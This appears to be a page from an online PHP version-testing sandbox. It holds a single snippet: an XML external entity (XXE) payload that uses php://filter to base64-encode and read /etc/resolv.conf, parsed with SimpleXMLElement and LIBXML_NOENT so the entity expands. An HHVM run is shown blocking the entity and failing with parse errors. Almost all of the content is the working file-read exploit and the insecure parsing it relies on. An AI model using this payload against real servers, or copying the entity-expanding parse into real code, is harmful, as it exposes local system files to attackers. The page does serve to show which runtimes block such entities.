run code in 200+ php & hhvm versions
Bugs & Features
<?php $xml = '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE strony [ <!ENTITY shp SYSTEM "php://filter/convert.base64-encode/resource=/etc/resolv.conf"> ] > <strony> <strona id="cccc"> <nazwa>bbbb</nazwa> <url>http://www.aaaa.pl/</url> <komentarz> &shp;</komentarz> </strona> </strony>'; $strony = new SimpleXMLElement($xml, LIBXML_NOENT); foreach($strony->strona->komentarz as $komentarz) echo "$komentarz\n";
based on Esvet
Output for 5.6.0 - 5.6.30, 7.0.0 - 7.2.0
Output for hhvm-3.15.4
Warning: Protocol 'php' for external XML entity 'php://filter/convert.base64-encode/resource=/etc/resolv.conf' is disabled for security reasons. This may be changed using the hhvm.libxml.ext_entity_whitelist ini setting. in /in/bEHdi on line 14 Fatal error: Uncaught exception 'Exception' with message 'String could not be parsed as XML' in /in/bEHdi:14 Stack trace: #0 /in/bEHdi(14): SimpleXMLElement->__construct() #1 {main} Entity: line 9: parser error : Failure to process entity shp <komentarz> &shp;</komentarz> ^ Entity: line 9: parser error : Entity 'shp' not defined <komentarz> &shp;</komentarz> ^
Process exited with code 255.